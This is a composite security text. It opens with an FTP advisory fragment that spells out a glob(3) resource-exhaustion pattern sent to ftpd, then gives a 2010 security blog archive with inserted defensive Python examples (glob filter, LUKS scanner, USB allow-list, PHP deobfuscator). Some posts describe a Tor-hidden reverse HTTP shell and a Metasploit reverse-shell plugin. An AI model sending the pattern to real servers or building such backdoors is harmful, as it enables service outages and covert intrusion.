331 Guest login ok, type your name as password.
pass anon@cxib
230-
The NetBSD Project FTP Server located in Redwood City, CA, USA
...
230-
EXPORT NOTICE

...
230 Guest login ok, access restrictions apply.
stat
{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}
/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx

this request will generate 100% usage of process a long time. ftpd come
into glob(3) and will not fast out. Very similar sympthon was described in
vulnerability for glibc strfmon(3)
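Added example, not from the advisory or from any of the affected ftpd implementations: since GLOB_LIMIT caps the number of matches but not the work spent on patterns that match nothing, a server-side pre-filter on the pattern itself is the practical mitigation. This Python function rejects a pattern before it reaches glob(3) when it has too many wildcards, too many '..' components, or a brace-expansion product beyond a bound; the three limits are assumed values to tune per service, and the advisory's two patterns are reused as test input.

```python
"""Reject globbing requests that would explode before they reach glob(3) (added example)."""
import re

# Assumed limits; tune per service. Legitimate FTP listing patterns are short.
MAX_WILDCARDS = 4     # total '*' and '?' in one pattern
MAX_DOTDOT = 2        # '..' path components
MAX_EXPANSIONS = 64   # product of brace-alternative counts


def brace_expansion_count(pattern):
    """Product of alternative counts over every {a,b,c} group (innermost groups of a nest are counted)."""
    total = 1
    for group in re.findall(r"\{([^{}]*)\}", pattern):
        total *= group.count(",") + 1
    return total


def glob_request_ok(pattern):
    """Return (ok, reason); reject a pattern the daemon should not hand to glob(3)."""
    wild = pattern.count("*") + pattern.count("?")
    if wild > MAX_WILDCARDS:
        return False, f"{wild} wildcards > {MAX_WILDCARDS}"
    dotdot = sum(1 for part in pattern.split("/") if part == "..")
    if dotdot > MAX_DOTDOT:
        return False, f"{dotdot} '..' components > {MAX_DOTDOT}"
    expansions = brace_expansion_count(pattern)
    if expansions > MAX_EXPANSIONS:
        return False, f"{expansions} brace expansions > {MAX_EXPANSIONS}"
    return True, "ok"


# The two patterns from the advisory, reused here as test input.
ADVISORY_PATTERN_1 = "*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*"
ADVISORY_PATTERN_2 = (
    "{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}"
    "/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*/{..,..,..}/*cx"
)

if __name__ == "__main__":
    for p in ("pub/*.txt", "{a,b}/*.c", ADVISORY_PATTERN_1, ADVISORY_PATTERN_2):
        print(glob_request_ok(p), p[:40])
```

The check belongs wherever the daemon takes a user-supplied path for STAT, LIST or NLST; a rejected pattern should get a 5xx reply rather than a call into glob(3).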

Thursday, October 7, 2010

Security Incident Cycle and common Incident Management mistakes

Nice post from the SANS Computer Forensics Blog about the Security Incident Cycle and how organizations struggle to follow the steps.

This post was inspired by Richard Bejtlich's presentation at the Forensics Incident Response Summit 2010.

Links: Richard Bejtlich's Presentation

LUKS encrypted disk forensics

This great article from SANS Computer Forensics shows how to perform forensic investigations on a disk image that contains LUKS volumes.

The following tricks appear in the article:
  • Use 'losetup' to create a read-only loop device pointing to the LUKS partition.
  • Use 'cryptsetup' to verify that the partition is LUKS and then mount it.
  • LVM2 fu to load/unload the Volume Groups
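Added example, not from the SANS article: before running losetup and cryptsetup it helps to know where the LUKS containers sit inside a raw image. This Python script scans an image sector by sector for the LUKS magic and decodes the LUKS1 header fields (cipher, mode, hash, payload offset, key size, UUID); the byte offset it reports is what you pass to losetup -r -o. The sample image is constructed in build_sample_image() and contains no real key material.

```python
"""Locate and decode LUKS1 headers inside a raw disk image (added example, not from the article)."""
import struct

LUKS_MAGIC = b"LUKS\xba\xbe"
SECTOR = 512
# LUKS1 phdr (big-endian): magic[6] version:u16 cipherName[32] cipherMode[32] hashSpec[32]
# payloadOffset:u32 keyBytes:u32 mkDigest[20] mkDigestSalt[32] mkDigestIterations:u32 uuid[40]
PHDR = struct.Struct(">6sH32s32s32sII20s32sI40s")


def _cstr(raw):
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")


def parse_luks1_header(buf):
    """Decode the fields an investigator wants from a LUKS1 header."""
    f = PHDR.unpack_from(buf, 0)
    if f[0] != LUKS_MAGIC:
        raise ValueError("no LUKS magic")
    return {
        "version": f[1],
        "cipher": _cstr(f[2]),
        "mode": _cstr(f[3]),
        "hash": _cstr(f[4]),
        "payload_offset_sectors": f[5],  # encrypted data starts this many sectors after the header
        "key_bytes": f[6],
        "mk_iterations": f[9],
        "uuid": _cstr(f[10]),
    }


def scan_image(image_bytes):
    """Return [(byte_offset, header)] for every sector that starts with the LUKS magic."""
    hits = []
    for off in range(0, len(image_bytes) - PHDR.size + 1, SECTOR):
        if image_bytes[off:off + len(LUKS_MAGIC)] == LUKS_MAGIC:
            hits.append((off, parse_luks1_header(image_bytes[off:off + PHDR.size])))
    return hits


def build_sample_image():
    """Constructed 32 KiB image: zeros with a LUKS1-looking header at sector 8 (no real keys)."""
    hdr = PHDR.pack(
        LUKS_MAGIC, 1, b"aes", b"xts-plain64", b"sha1", 4096, 32,
        b"\x11" * 20, b"\x22" * 32, 123456, b"00000000-0000-4000-8000-000000000001",
    )
    img = bytearray(64 * SECTOR)
    img[8 * SECTOR:8 * SECTOR + len(hdr)] = hdr
    return bytes(img)


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_image()
    for off, hdr in scan_image(data):
        print(f"LUKS{hdr['version']} at byte {off} (losetup -r -o {off}): "
              f"{hdr['cipher']}-{hdr['mode']} {hdr['key_bytes'] * 8}-bit, uuid {hdr['uuid']}")
```

For a multi-gigabyte image, read it in chunks aligned to the sector size instead of slurping the whole file; the per-sector check is the same.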

Linux USB policies

Many people don't know this, but the Linux kernel allows administrators to enable/disable the use of USB devices in the system, per device or with a default policy (which is to allow everything by default).

Authorize a device to connect:
        $ echo 1 > /sys/bus/usb/devices/DEVICE/authorized

Deauthorize a device:
        $ echo 0 > /sys/bus/usb/devices/DEVICE/authorized

Set new devices connected to hostX to be deauthorized by default (i.e. lock down):
        $ echo 0 > /sys/bus/usb/devices/usbX/authorized_default

Remove the lock down:
        $ echo 1 > /sys/bus/usb/devices/usbX/authorized_default


For more information:
http://www.mjmwired.net/kernel/Documentation/usb/authorization.txt


It is also possible to disable all storage devices by unloading the kernel module. Yes, old school :D

Just add the following entry to /etc/rc.local:

rmmod usb_storage
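Added example, not from the kernel documentation: a Python script that turns the knobs above into an allow-list policy. It sets authorized_default to 0 on every host controller and then authorizes only devices whose (idVendor, idProduct) pair is in ALLOWED, deauthorizing the rest; root hubs and interface entries are skipped. demo() runs the same functions against a constructed sysfs-like tree in a temporary directory so it can be exercised without root; the vendor/product IDs in it are constructed placeholders.

```python
"""USB allow-list policy on top of the sysfs authorization knobs (added example)."""
import glob
import os
import tempfile

# (idVendor, idProduct) pairs that may connect; constructed placeholder IDs.
ALLOWED = {("046d", "c31c")}


def _read(path):
    with open(path) as fh:
        return fh.read().strip()


def _write(path, value):
    with open(path, "w") as fh:
        fh.write(value)


def lock_down_hosts(sysfs_root="/sys/bus/usb/devices"):
    """Set authorized_default=0 on every host controller so new devices start deauthorized."""
    hosts = []
    for host in sorted(glob.glob(os.path.join(sysfs_root, "usb*"))):
        _write(os.path.join(host, "authorized_default"), "0")
        hosts.append(os.path.basename(host))
    return hosts


def apply_allow_list(allowed, sysfs_root="/sys/bus/usb/devices"):
    """Authorize allow-listed devices, deauthorize every other device; return {device: value}."""
    decisions = {}
    for dev in sorted(glob.glob(os.path.join(sysfs_root, "*"))):
        name = os.path.basename(dev)
        if name.startswith("usb"):
            continue  # root hubs: deauthorizing them would drop the whole bus
        vid_path, pid_path = os.path.join(dev, "idVendor"), os.path.join(dev, "idProduct")
        if not (os.path.exists(vid_path) and os.path.exists(pid_path)):
            continue  # interface entries (e.g. 1-2:1.0) carry no vendor/product IDs
        value = "1" if (_read(vid_path), _read(pid_path)) in allowed else "0"
        _write(os.path.join(dev, "authorized"), value)
        decisions[name] = value
    return decisions


def build_fake_sysfs(root):
    """Constructed sysfs-like tree: a root hub, an allowed keyboard, a storage stick and its interface."""
    spec = {
        "usb1": {"idVendor": "1d6b", "idProduct": "0002", "authorized": "1", "authorized_default": "1"},
        "1-1": {"idVendor": "046d", "idProduct": "c31c", "authorized": "1"},
        "1-2": {"idVendor": "0781", "idProduct": "5567", "authorized": "1"},
        "1-2:1.0": {"bInterfaceClass": "08"},
    }
    for name, files in spec.items():
        os.makedirs(os.path.join(root, name))
        for fname, val in files.items():
            _write(os.path.join(root, name, fname), val + "\n")


def demo():
    """Run the policy against the constructed tree; return (hosts, decisions, authorized_default)."""
    root = tempfile.mkdtemp(prefix="usb-policy-")
    build_fake_sysfs(root)
    hosts = lock_down_hosts(root)
    decisions = apply_allow_list(ALLOWED, root)
    return hosts, decisions, _read(os.path.join(root, "usb1", "authorized_default"))


if __name__ == "__main__":
    print(demo())
    # Against the real tree (needs root): lock_down_hosts(); apply_allow_list(ALLOWED)
```

Because authorized_default only affects devices plugged in after it is set, run apply_allow_list() once at boot as well, so devices that were already present get the same decision.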




Tuesday, October 5, 2010

Hard times for ASP.NET

On September 28th Microsoft published bulletin MS10-070, which fixed an information disclosure in ASP.NET (the .NET framework).

As David Aitel pointed out,

It's your basic massive break-the-internet nightmare, that Microsoft has avoided for many years since Code Red and the rest of the big worms ran rampant on IIS. It's interesting that this time around it's not a buffer overflow.


Looks like some people are having lots of fun lately and many system administrators are going to have a hard time.

ISC also dedicated a Diary entry to it.
"In Microsoft .NET Framework 3.5 Service Pack 1 and above, this vulnerability can be used by an attacker to retrieve the contents of any file within the ASP.NET application, including web.config" and "This vulnerability can also be used for data tampering, which, if successfully exploited, could be used to decrypt and tamper with the data encrypted by the server."
According to the bulletin, MSFT is aware of "active attacks".

If this is not enough, Packet Storm Security published a proof of concept that exploits this vulnerability.

Proof of concept exploit that demonstrates the downloading of Web.config. This affects unpatched versions of .NET framework 3.5 Sp1. Full details are available on the homepage.

PHP code deobfuscation

The Zscaler weblog describes how to use evalhook from Stefan Esser to deobfuscate PHP code.

They point to the following article, which explains how the tool works.

From Stefan Esser's article:
Whenever encoders like php-crypt have to be analysed the task is usually the same. You take the script, replace all calls to eval() with die() and check what it tries to eval(). When it looks safe you will replace the eval() with the evaluated code and repeat. This is a very stupid and time consuming work, especially when there are multiple wrappers of eval(). Therefore I wrote a short PHP extension called evalhook that helps with this task.
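Added example, not evalhook and not Stefan Esser's code: evalhook hooks eval() at runtime, but the same layered encoders can often be unwrapped statically without executing anything. This Python script peels eval(...(base64_decode('...'))) wrappers built from base64_decode, gzinflate, gzuncompress, str_rot13 and strrev, innermost call first, until no eval() remains, and stops when it meets a function it does not know. build_sample() constructs a harmless two-layer sample in that style.

```python
"""Statically peel eval()-wrapped PHP layers (added example; not evalhook, which hooks eval at runtime)."""
import base64
import codecs
import re
import zlib

# PHP decoder functions and their Python equivalents, operating on bytes.
DECODERS = {
    "base64_decode": base64.b64decode,
    "gzinflate": lambda b: zlib.decompress(b, -15),  # raw DEFLATE, no zlib header
    "gzuncompress": zlib.decompress,                  # zlib-wrapped
    "str_rot13": lambda b: codecs.decode(b.decode("latin-1"), "rot13").encode("latin-1"),
    "strrev": lambda b: b[::-1],
}

# eval( f1( f2( ... 'literal' ) ... ) );  with a quoted literal and no escaped quotes inside it.
EVAL_RE = re.compile(
    r"eval\s*\(\s*((?:[a-z0-9_]+\s*\(\s*)+)(['\"])(.*?)\2\s*(?:\)\s*)+;?", re.S | re.I
)


def unwrap(src, max_layers=20):
    """Replace each eval(...) wrapper by its decoded content; return (source, decoders_applied)."""
    applied = []
    for _ in range(max_layers):
        m = EVAL_RE.search(src)
        if not m:
            break
        names = re.findall(r"[a-z0-9_]+", m.group(1), re.I)
        data = m.group(3).encode("latin-1")
        for fn in reversed(names):  # innermost call runs first
            fn = fn.lower()
            if fn not in DECODERS:
                applied.append(f"unknown:{fn}")
                return src, applied  # stop rather than guess
            data = DECODERS[fn](data)
            applied.append(fn)
        src = src[:m.start()] + data.decode("latin-1") + src[m.end():]
    return src, applied


def build_sample():
    """Constructed two-layer sample in php-crypt style (harmless: it just echoes a string)."""
    inner = 'echo "stage2";'
    rot = base64.b64encode(codecs.encode(inner, "rot13").encode()).decode()
    layer1 = f"eval(str_rot13(base64_decode('{rot}')));"
    raw_deflate = zlib.compress(layer1.encode())[2:-4]  # strip zlib header and adler32 trailer
    layer2 = base64.b64encode(raw_deflate).decode()
    return f"<?php eval(gzinflate(base64_decode('{layer2}'))); ?>"


if __name__ == "__main__":
    code, layers = unwrap(build_sample())
    print(layers)
    print(code)
```

Real samples add wrappers this regex does not cover (variable function names, string concatenation, preg_replace with /e); when unwrap() returns an unknown: entry, that is the point where evalhook's runtime approach takes over.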

Saturday, October 2, 2010

Having fun with game servers

Last week I was bored and needed something to keep me busy. I thought it would be nice to write a simple script that monitors my favorite game servers (Wolfenstein: Enemy Territory), so I know which map is currently being played as well as the number of players.

I wrote two scripts: the first one is the desktop version and the second one is for my Android phone. It only took me a few hours to finish, so it is not impressive, but it was fun :D

The desktop version uses libnotify to pop up a window every time a new map is being played. It displays the map name and the number of used slots for each server.


The Android version does pretty much the same, but alerts me, by vibrating or with text to speech, when one of the servers is unreachable.

F-secure: Stuxnet Questions and Answers

Nice article from F-Secure about the Stuxnet worm.

It helps to easily understand which systems it targets and the attack vectors used.

Podcasts in German

I have been trying to learn German for a year now and I thought it would be nice to listen to podcasts to improve my skills. German is not that easy, ok? :D

I have been looking for podcasts related to IT so that I have an extra incentive to pay attention and keep trying.

Chaos Radio
http://chaosradio.ccc.de/chaosradio-latest.rss

Chaos Express
http://chaosradio.ccc.de/chaosradio_express-latest.rss

/dev/radio
http://ulm.ccc.de/dev/radio/podcast.xml

Fnordfunk
http://fnordfunk.cccmz.de/index.php?/feeds/index.rss2

Hackerfunk
http://www.hackerfunk.ch/podcast.php

NerdAlert Podcast (Mp3)
http://nerdalert.de/feeds/podcast-mp3.xml

radio chaotica podcast
http://entropia.de/podcast.xml

RadioTux GNU/Linux
http://blog.radiotux.de/radiotux/podcast/feed/

www.c3d2.de Newsfeed
http://www.c3d2.de/news-rss.xml

Reverse HTTP evilness

Some months ago I heard people talking about using Tor to anonymously scan your target network by using the SOCKS interface and socksifying tools like Nmap, etc.

What amazed me was the Tor backdoor that the guys at Carnal Ownage created. Unfortunately, it is only meant for Windows environments because that is the main platform pentesters are working with.

I came up with the idea of making something (a crappy script in my case) that could be executed easily in a Unix environment. Basically, I borrowed some RSA and Blowfish code implemented in Python and created a reverse HTTP shell that encrypts all the traffic.


This script also permits uploading and downloading small files. Unfortunately, Python is too inefficient in this case and it will use all the resources available on the computer. Forget about using this method to upload your toolkit :D

The most interesting part is that it can use an HTTP Tor proxy to connect to a hidden service, so you can run a reverse backdoor and the destination will not be identified. Of course, I coded this script for fun and it should only be used for educational purposes and to show how difficult it is to defend a network (and how easy it is to fly under the radar if you have some skills).


The code is not finished yet because I have been too busy since then, but it works :D

I think it is a good way to teach people that they should not rely on tools to defend their networks. They have to understand that they are going to be compromised sooner or later, and they have to design their networks and strategies to identify the existing compromise and respond to the incident as quickly as possible.

Metasploit and local file inclusion

I am not a super skilled hacker (probably I am the opposite), but one thing I do have is the mindset. Whenever I read something interesting, I want to go beyond it and I keep thinking about it until I come up with something.

A long time ago I read about an interesting project called fimap that is meant to exploit LFI (Local File Inclusion) in web servers, mainly PHP.

I thought it would be nice to integrate it somehow with Metasploit because it is the framework that many people are using nowadays. It took me some time to write a Python wrapper that creates/encodes payloads and communicates with Metasploit using XML-RPC.


As a result, we have a fimap plugin that interacts with a running Metasploit console and pops a reverse shell, for Windows and Unix. I had to make some changes with their help because I am not a skilled programmer and I didn't know how to implement a plugin system. I think it was a great experience!

The original code is in my subversion repository.